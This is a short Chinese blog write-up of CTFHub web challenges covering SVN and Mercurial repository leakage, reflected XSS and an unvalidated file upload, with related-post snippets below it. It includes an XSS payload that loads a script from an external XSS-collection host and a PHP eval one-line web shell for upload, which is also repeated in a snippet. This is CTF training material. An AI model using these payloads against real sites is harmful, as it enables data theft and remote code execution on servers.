ctfhub-svn泄漏,HG泄漏,XSS反射性,文件上传--无验证

最新推荐文章于 2024-06-07 21:24:16 发布
最新推荐文章于 2024-06-07 21:24:16 发布
阅读量2k 收藏
点赞数
文章标签: svn 安全 hg web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_55702959/article/details/122761765
版权

目录

CTFHUB-SVN泄漏

 HG泄露

 XSS反射型

文件上传 --无验证

CTFHUB-SVN泄漏

SVN(subversion)是程序员常用的源代码版本管理软件。一旦出现SVN泄漏黑客可获取网站源代码,一方面是掠夺了网站的技术知识资产,另一方面,黑客还可通过源代码分析其它安全漏洞,从而对网站服务器及用户数据造成持续威胁

---------------------------------------------------------------------------------------------

首先先下载:dvcs-ripper(在kali中)

./rip-svn.pl -v -u http://challenge-3b6d43d72718eefb.sandbox.ctfhub.com:10080/.svn/

进行相关配置和组件

sudo apt-get install perl libio-socket-ssl-perl libdbd-sqlite3-perl libclass-dbi-perl libio-all-lwp-perl

进入工具目录/dvcs-ripper,执行下面命令

 HG泄露

hit:当开发人员使用 Mercurial 进行版本控制,对站点自动部署。如果配置不当,可能会将.hg 文件夹直接部署到线上环境。这就引起了 hg 泄露漏洞。

 

 XSS反射型

跨站脚本攻击XSS(Cross Site Scripting):

 

具体可参考https://www.cnblogs.com/csnd/p/11807592.html

而反射型xss则不是这样,每次触发只能手动输入和点击才能触发。

我认为xss产生的原因主要是对html标签审查不严格造成的。

--------------------------

题目说有xss所以去XSS平台搞一个承接数据的网址。https://xssaq.com/xss.php?do=project&act=view&id=11589

 

复制</tExtArEa>'"><sCRiPt sRC=https://xssaq.com/YG2V></sCrIpT>

返回平台打开

 

 

文件上传 --无验证

在记事本中写入

<?php eval($_POST['123'])?>

取名为a.txt 保存之后又改名为a.php 上传

用蚁剑

 

 

 

 

 

 

daphne31
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Seay-Svn源代码泄露漏洞扫描工具
07-08
但一些网站管理员在发布代码时,不愿意使用‘导出’功能,而是直接复制代码文件夹到WEB服务器上,这就使.svn隐藏文件夹被暴露于外网环境,黑客可以借助其中包含的用于版本信息追踪的‘entries’文件,逐步摸清站点...
TortoiseSVN-1.14.0.28885-x64-svn-1.14.0
11-15
《TortoiseSVN-1.14.0.28885-x64-svn-1.14.0及其简体中文语言包详解》 TortoiseSVN,一个深受开发者喜爱的版本控制系统客户端,是Subversion(SVN)在Windows平台上的图形化界面。版本号为1.14.0.28885的x64位版本...
ctfhubsvn信息泄露
tempulcc的博客
10-08 5063
ctfhubsvn信息泄露1、漏洞形成原理1)什么是SVN?2)漏洞成因3)漏洞修复2、ctf实战1)配置工具环境2)恢复.svn3)进入.svn目录,查找flag 1、漏洞形成原理 1)什么是SVN? SVN是subversion的缩写,是一个开放源代码的版本控制系统,通过采用分支管理系统的高效管理,简而言之就是用于多个人共同开发同一个项目,实现共享资源,实现最终集中式的管理。 2)漏洞成因 在服务器上布署代码时。如果是使用 svn checkout 功能来更新代码,而没有配置好目录访问权限,则会存在此
ctfhubsvn泄露
weixin_50683638的博客
11-24 1881
WP ——svn 题目如下: dirsearch-master>python dirsearch.py -u URL -e *看到svn目录右击鼠标可暂停扫描 在kali中用dvcs-ripper扫描./rip-svn.pl -v -u URL.svn/ 因为svn是隐藏文件,所以ls -a查看文件
CTFHub:web前置技能-信息泄露-SVN泄露
最新发布
wdnmddbl的博客
06-07 877
路漫漫其修远兮,吾将上下而求索。本文涉及以下知识点,去引用文章学习即可:链接:我是一个知识点链接:我是一个知识点链接:我是一个知识点链接:dvcs-ripper下载点我链接:svnExploit下载点我大概思路和涉及的知识点(这里我一律复制网上师傅总结的即可,网上的师傅们总结的很完美,我就不东施效颦)思路:文章很详细。
CTFHub日记,ctfhub文件上传验证
dqx1223的博客
01-09 1988
ctfhub文件上传—无验证
CTFHub | SVN泄露
尼泊罗河伯的博客
10-13 4912
此题使用 kali-linux 系统完成,因为使用 windows 系统环境使用 Perl 配置环境变量过于繁琐,且 Perl 更适合在 Linux 环境中使用。在做这题碰到的坑还挺多,一开始尝试了使用各种 SVN 泄露漏洞利用工具,最后发现 dvcs-ripper 这个工具比较好用。配置好工具及环境后,使用工具将泄露文件 clone 到本地目录下,最后通过检索文件发现 6e 文件中的文件存放此题 flag 。
ctfhub--svn泄露
ljj20020718的博客
11-17 532
ctfhubsvn泄露
Seay-Svn源代码泄露漏洞利用工具1.0+2.0.zip
03-24
SVN是源代码版本管理软件,造成SVN源代码漏洞的主要原因是管理员操作不规范。“在使用SVN管理本地代码过程中,会自动生成一个名为.svn的隐藏文件夹,其中包含重要的源代码信息。但一些网站管理员在发布代码时,不...
Seay-Svn.rar
08-02
Seay-Svn.rar 是一个与Subversion(简称svn)相关的压缩包,可能包含了Seay,一个知名的开源项目,用于Subversion版本控制系统的管理和操作。Subversion是一个广泛使用的集中式版本控制系统,它允许用户跟踪和控制...
py36-pysvn-svn1140-1.9.12-2041-Win64.exe
07-13
PySVN提供了Python语言环境下进行Subversion操作的语言支持,比官方的python语言绑定有更好的API。
CTFHUb--SVN泄露
m0_73605862的博客
07-23 479
然后进入这个.svn文件,一直进入直到看到pristine文件(存放旧服务器源代码的文件)然后尝试进入文件 ,结果第一个就是flag。首先到dvcs-ripper目录下进行使用rip-svn.pl,然后输入。1.因为要找到旧版本的源代码,则是找到pristine文件。查看该目录下的所有文件,可以看到一个后缀为.svn的隐藏文件。
ctfhub--ctf--web--文件上传(1.无验证 2.前端验证 3..htaaccess4.MIME绕过5.00截断6.双写后缀7.文件头检查)
feiniaotjx的博客
10-10 453
ctfhub--ctf--web--文件上传1.无验证2.前端验证3. .htaaccess4.MIME绕过5.00截断6.双写后缀7.文件头检查 1.无验证 上传一句话木马 <?php @eval($_POST['123']);?>,上传成功,显示路径 找到flag文件 查看flag 2.前端验证 将onsubmit里面的return checkfilesuffix()删了,再点提交 找到flag文件 查看flag 还可以使用蚁剑 3. .htaaccess 上传.htaccess
CTFHUBSVN泄露HG泄露
m0_56988395的博客
03-03 5549
目录 1、SVN泄露 2、HG泄露 1、SVN泄露 其实我们应该先用dirsearch先扫的,这才是一个完整的流程,但是我们这里直接根据提示来,这里利用一款的perl版本控制软件信息泄露利用工具,叫dvcs-ripper,支持SVN, GIT, Mercurial/hg, bz等等,工具直接上github上搜,基本都是有的。 这里提示是svn泄露,所以我们使用rip-svn.pl模块 perl ./rip-svn.pl -v -u http://challenge-609b.
CTFHub-Web-信息泄露-SVN泄露
qq_54037445的博客
11-19 723
CTFHub-信息泄露-SVN泄露
CTFHub 信息泄露
qq_58879949的博客
09-06 987
手动遍历。
ctfhubhg泄露
weixin_43326436的博客
06-14 603
1,使用工具无解,报错 2.直接找到.hg/store/fncache 看到flag字样 直接: curl http://challenge-5eb9243d368c715b.sandbox.ctfhub.com:10080/flag_191311251.txt curl是一个和服务器交互信息(发送和获取信息)的命令行工具。 ...
CTFHUB WEB 信息泄露(补充)
wwwwyyyrre的博客
05-15 146
上一次没有写完这个技能树知识点 这次补上。
dropins-svn插件
01-23
Dropins-svn插件是一款用于集成Subversion版本控制系统的Eclipse插件。Subversion(简称SVN)是一种常用的集中式版本控制系统,而Eclipse是一款功能强大的集成开发环境(IDE)。 Dropins-svn插件可以让开发人员在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值